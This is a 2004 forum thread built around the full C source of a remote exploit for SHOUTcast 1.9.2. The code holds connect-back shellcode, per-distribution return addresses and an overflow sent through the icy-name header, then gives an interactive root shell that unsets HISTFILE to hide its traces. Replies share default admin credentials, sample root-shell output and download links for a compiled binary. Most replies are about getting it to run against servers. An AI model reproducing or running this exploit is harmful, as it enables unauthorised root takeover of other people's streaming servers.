Shoutcast V1.9.2 Remote Exploit

ducky

Mar 5 2004, 07:55 AM

Something i found...hope you need it...i do,i run a radio so i gotta test it for this vuln.

CODE

*/

#include <stdio.h>
#include <stdarg.h>
#include <stdlib.h>
#include <netdb.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <getopt.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <errno.h>
#include <linux/sockios.h>

#define BUF 1024

struct {
char *distro;
char *type;
unsigned long ret;
unsigned long eax;

} targets[] = { /* Thanks all #oseen;) */
{ "Slackware 8.1 ", "Shoutcast 1.9.2 ", 0x8091b28, 0x0806d0e3 },
{ "Slackware 9.0 ", "Shoutcast 1.9.2", 0x806d06b, 0x0806d0e3 },
{ "Slackware 9.1 ", "Shoutcast 1.9.2 ", 0x080d1c78, 0x0806d0e3 },
{ "Redhat 7.2 ", "Shoutcast 1.9.2", 0x080d11e0, 0xbffff344 },
{ "Crash ", "(All platforms) ", 0xBADe5Dee, 0x0806d0e3 },
};
char linux_connect_back[] = /* connect back 45295 */
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\x41\x42\x43\x44\x66\x68\xb0"
"\xef\xb1\x02\x66\x51\x89\xe7\xb3"
"\x10\x53\x57\x52\x89\xe1\xb3\x03"
"\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
"\x74\x06\x31\xc0\xb0\x01\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
"\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
"\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x50\x53\x89"
"\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80";
int sock;
void usage();
void shell();

void
usage(char *prog)
{

fprintf(stderr,"Usage: %s -t [-pah]\n",prog);
fprintf(stderr,"-t version Linux version.\n");
fprintf(stderr,"-h target The host to attack.\n");
fprintf(stderr,"-a password Default password is \"changeme\".\n");
fprintf(stderr,"-p port Default port is 8001.\n\n");
}

int
openhost(char *host,int port)
{
struct sockaddr_in addr;
struct hostent *he;

he=gethostbyname(host);

if (he==NULL) return -1;
sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
if (sock==-1) return -1;

memcpy(&addr.sin_addr, he->h_addr, he->h_length);

addr.sin_family=AF_INET;
addr.sin_port=htons(port);

if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
sock=-1;
return sock;
}

void
shell(int sock)
{
fd_set fd_read;
char buff[1024], *cmd="unset HISTFILE; /bin/uname -a;/usr/bin/id; echo '*** oseen are chinese...'\n";
int n;

FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
FD_SET(0, &fd_read);

send(sock, cmd, strlen(cmd), 0);

while(1) {
FD_SET(sock, &fd_read);
FD_SET(0, &fd_read);

if (select(sock+1, &fd_read, NULL, NULL, NULL) < 0) break;

if (FD_ISSET(sock, &fd_read)) {
if ((n = recv(sock, buff, sizeof(buff), 0)) < 0){
fprintf(stderr, "[+] EOF\n");
exit(2);
}

if (write(1, buff, n) <0) break;
}

if (FD_ISSET(0, &fd_read)) {
if ((n = read(0, buff, sizeof(buff))) < 0){
fprintf(stderr,"[+] EOF\n");
exit(2);
}

if (send(sock, buff, n, 0) < 0) break;
}
}

fprintf(stderr,"[+] Connection lost.\n\n");
exit(0);
}

unsigned char
*get_my_ip_addr(int sockfd, struct ifreq *ifr)
{
struct sockaddr_in sin;
char *b = (char *) malloc(4);

if (ioctl(sockfd ,SIOCGIFADDR,ifr) < 0) {
fprintf(stderr, "Unable to get the local IP Address, use -d.\n");
exit(1);
}

memcpy(&sin, &ifr->ifr_addr, sizeof(struct sockaddr_in));
memcpy(b, (char *) &sin.sin_addr.s_addr, 4);
return b;
}

int
main (int argc,char *argv[])
{
char buf1[512];
char buf2[512];
char host[256];
char pass[256]="changeme";
char data;

int type= 0;
int c=0;
int port=8001;
char device[256] = "ppp0";
unsigned char *ptr;

struct hostent *hp;
struct sockaddr_in sin_listener;
struct ifreq ifr;
struct timeval timeout;

fd_set fdread;

int delay = 12;
int i = 0;
int mode = 0;
int local_port = 0;
int opt = 0;
int ret = 0;
int sin_len = sizeof (struct sockaddr_in);
int sock = 0;
int sock2 = 0;
int sockd = 0;
int listener = 0;
int time_out = 4;
int tmp = 0;

srand(getpid());

fprintf(stdout,"SHOUTcast v1.9.2 remote exploit by exworm of 0seen\n");
fprintf(stdout,"--------------------------------------------------(www.oseen.org)\n");

while((c=getopt(argc,argv,"h:p:a:t:")) !=EOF)
{
switch(c)
{
case 'p':
port=atoi(optarg);
if ((port <= 0) || (port > 65535)) {
fprintf(stderr,"Invalid port.\n\n");
exit(1);
}
break;
case 'a':
memset(pass,0x0,sizeof(pass));
strncpy(pass,optarg,sizeof(pass) - 1);
break;
case 't':
type = atoi(optarg);
if (type == 0 || type > sizeof(targets) / 28) {
for(i = 0; i < sizeof(targets) / 28; i++)
fprintf(stderr, "%02d. %s - %s [0x%08x - 0x%08x]\n",
i + 1, targets[i].distro, targets[i].type, targets[i].ret, targets[i].eax);
return -1;
}
break;
case 'h':
memset(host,0x0,sizeof(host));
strncpy(host,optarg,sizeof(host) - 1);
break;

default:
usage(argv[0]);
exit(1);
break;
}
}

timeout.tv_sec = time_out;
timeout.tv_usec = 0;

if (strlen(host) == 0) {
usage(argv[0]);
exit(1);
}
sock=openhost(host, 8001);

if (sock==-1) {
fprintf(stderr,"- Unable to connect.\n\n");
exit(1);
}

strncpy(ifr.ifr_name, device, 15);

if ((sockd = socket(AF_INET, SOCK_DGRAM, 17)) < 0) {
fprintf(stderr, "socket() error.\n");
return -1;
}

if ((listener = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
fprintf(stderr, "socket() error.\n");
return -1;
}

ptr = get_my_ip_addr(sockd, &ifr);
memcpy(&sin_listener.sin_addr.s_addr, ptr, 4);

sin_listener.sin_family = AF_INET;
memset(&sin_listener.sin_zero, 0x00, 8);

while(1) {
local_port = local_port = 45295;
sin_listener.sin_port = htons(local_port);
if (!bind(listener, (struct sockaddr *) &sin_listener, sin_len)) break;
}

listen(listener, 1);
fprintf(stdout, "[+] lisntener...\n");

linux_connect_back[33] = (unsigned int) *(ptr + 0);
linux_connect_back[34] = (unsigned int) *(ptr + 1);
linux_connect_back[35] = (unsigned int) *(ptr + 2);
linux_connect_back[36] = (unsigned int) *(ptr + 3);

write(sock, pass, strlen(pass));
write(sock, "\n", 1);

memset(buf2, 0x0, sizeof(buf2));
memset(buf1, 0x90, sizeof(buf1));

for(i=0;i < strlen(linux_connect_back); i++) buf1[i+50] = linux_connect_back[i];

buf1[191] = (targets[type - 1].ret & 0x000000ff);
buf1[192] = (targets[type - 1].ret & 0x0000ff00) >> 8;
buf1[193] = (targets[type - 1].ret & 0x00ff0000) >> 16;
buf1[194] = (targets[type - 1].ret & 0xff000000) >> 24;

buf1[199] = (targets[type - 1].eax & 0x000000ff);
buf1[200] = (targets[type - 1].eax & 0x0000ff00) >> 8;
buf1[201] = (targets[type - 1].eax & 0x00ff0000) >> 16;
buf1[202] = (targets[type - 1].eax & 0xff000000) >> 24;

buf1[308] = (targets[type - 1].eax & 0x000000ff);
buf1[309] = (targets[type - 1].eax & 0x0000ff00) >> 8;
buf1[310] = (targets[type - 1].eax & 0x00ff0000) >> 16;
buf1[311] = (targets[type - 1].eax & 0xff000000) >> 24;

sprintf(buf2, "icy-name:%s\r\n", buf1);

fprintf(stdout, "Connected, sending code...\n");
fprintf(stdout, "[+] Ret: 0x%08x\n", targets[type - 1].ret);
fprintf(stdout, "[+] Eax: 0x%08x\n", targets[type - 1].eax);
while(1) {
write(sock, buf2, strlen(buf2));
sleep(2);
FD_ZERO(&fdread);
FD_SET(listener, &fdread);

timeout.tv_sec = time_out;
timeout.tv_usec = 0;

while(1) {

ret = select(FD_SETSIZE, &fdread, NULL, NULL, &timeout);

if (ret < 0) {
close(sock);
close(listener);
fprintf(stderr, "select() error.\n");
return -1;
}

if (ret == 0) {
fprintf(stderr, "[+] Failed, waiting %d seconds.\n"
"[+] Use ctrl-c to abort.\n", delay);
sleep(delay);
break;
}

if(FD_ISSET(listener, &fdread)) {
sock2 = accept(listener, (struct sockaddr *)&sin_listener, &sin_len);
close(sock);
close(listener);

fprintf(stderr, "[+] ownedbyOseen!\n"
"-----------------------------------------------------------\n");
shell(sock2);
close(sock2);
return 0;
}
}

}

fprintf(stderr, "[+] Exploit failed.\n");
close(listener);
close(sock);
return 0;

}

daguilar01

Mar 5 2004, 07:29 PM

SHOUTcast v1.9.2 remote connect back exploit
first code part thats missing from whats pasted above,

CODE

/* _ ________ _____ ______
*
* oseen_shoucast.c( public version) - SHOUTcast v1.9.2 remote exploit / \ / "(filtered)
mm"
* by exworm of oseen (www.oseen.org) \/
* con back exploit
* bash-2.05b# ./oseen_shoutcast -t 2 -h XXX.XXX.XXX.XXX
* SHOUTcast v1.9.2 remote exploit by exworm of 0seen
* --------------------------------------------------(www.oseen.org)
* [+] lisntener...
* [+] Connected, sending code...
* [+] Ret: 0x0806d06b
* [+] Eax: 0x0806d0e3
* [+] ownedbyOseen!
* -----------------------------------------------------------
* Linux darkstar 2.4.20 #2 Mon Mar 17 22:02:15 PST 2003 i686 unknown
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
*(wheel),11(floppy)
*
*
*/

#include <stdio.h>
#include <stdarg.h>
#include <stdlib.h>
...
...

mivus

Mar 5 2004, 08:19 PM

can't compile with cygwin

(

hulk

Mar 5 2004, 11:04 PM

I compiled it, check the download section

DaClueless

Mar 6 2004, 01:39 AM

it not that good of an expoit, because you need to know the password to log onto the system before you can exploit it.

ducky

Mar 6 2004, 11:55 AM

QUOTE (niemic @ Mar 6 2004, 01:39 AM)

it not that good of an expoit, because you need to know the password to log onto the system before you can exploit it.

i think it's better

that way only radio admins can check the vuln and not some people who want to make a pubstro of your hosting...

DaClueless

Mar 6 2004, 03:43 PM

QUOTE (ducky @ Mar 6 2004, 11:55 AM)

i think it's better

that way only radio admins can check the vuln and not some people who want to make a pubstro of your hosting...

That is true, it is only a problem if you give people admin access to you SHOUTcast.

agathos

Mar 8 2004, 01:02 PM

default user & password are admin

maybe you have some luck to find

aapje

Mar 8 2004, 02:21 PM

when can i access download section ?

Frenkovic

Mar 9 2004, 01:37 AM

QUOTE (agathos @ Mar 8 2004, 01:02 PM)

default user & password are admin

maybe you have some luck to find

good info!

will try that for sure!

thesensor

Mar 12 2004, 04:51 PM

I really want access for download section

But thankz anywayz

Acid-Burn

Mar 12 2004, 04:55 PM

grt exploit
i tried it

(sorry for my english)

som3aa

Mar 12 2004, 10:53 PM

QUOTE (hulk @ Mar 5 2004, 11:04 PM)

I compiled it, check the download section

thanx Hulk but....
i don't have access to download section

could u host it anywhere please??

brOmstar

Mar 12 2004, 11:27 PM

why don't u try to compile the exploit?

Serhat

Mar 17 2004, 05:33 PM

QUOTE (aapje @ Mar 8 2004, 02:21 PM)

when can i access download section ?

You need to get MEMBER status

I wanted to compile it for you and share it on my webhost but...
getting a error that sockios.h can't be found.. when I downloaded it and put it in the dir.. it still gave the same message

Sorry..
I alteast tried

Serhat

[EDIT]

Could manage to get it too work after renaming some source files etc..

get it @...
http://members.lycos.nl/sgu/Shoutcast.rar
Password for the rar is.. governmentsecurity
Don't want to Admin knows what I upload

[EDIT2}
I got an e-mail saying it gives an error that's because it needs cygwin1.dll...
it is a free dll.. so you could get it without problems.. but I upped that one also...
to make it easier for you all

http://members.lycos.nl/sgu/cygwin1.dll

Serhat

KieMaN

Mar 19 2004, 12:50 AM

Nice i should try it

oxydrine

Mar 19 2004, 07:01 AM

Nice i try it to

thx so much for this xploit

Sp00ky

Mar 21 2004, 08:46 AM

hey m8 this is something usefull i think nice xploit

Sp00ky

Mar 21 2004, 08:49 AM

umm i get a realy weird error when trying this sploit..
it says that my cygwin1.dll is not a good windows copy or something :S

eclipze

Mar 21 2004, 10:09 AM

you need cygwin1.dll in the same dir as you run the sploit in

, caus its a linux sploit..

aapje

Mar 21 2004, 11:18 AM

well i tried it with linux, when i fill in target etc, it says unable to fetch local ip use -d. THen i use -d, then it says invalid parameter -d =\

Sp00ky

Mar 21 2004, 11:19 AM

i did that and still i get that error :S

mkwento

Mar 21 2004, 11:24 AM

"...cygwin1.dll is not a good windows copy or something .."

i've the same error

dexxxx

Mar 21 2004, 12:36 PM

good exploit.

works. but u need a shoutcast account

Gehaktbal

Mar 21 2004, 12:48 PM

QUOTE (dexxxx @ Mar 21 2004, 12:36 PM)

good exploit.

works. but u need a shoutcast account

You can check if your own server is vulnerable but i guess you can't start a massive root with this

hehe.

Try securing your Shoutcast

XpProf

Mar 21 2004, 01:12 PM

It's out Shoutcast 1.9.4, i think that all servers are now updated.

Dl-Piro

Mar 21 2004, 02:47 PM

i got a problam
Serhat i do all what u said i download cygwin1.dll and still get error
"cygwin1.dll is not a vaild windows image. Please check the against installation diskette."

plz some one can help me ??????

Silent Bob

Mar 21 2004, 03:41 PM

maybe because your dll is outta date, try downloading a newer version,
i got a prob like that, could of been bad dll, im unsure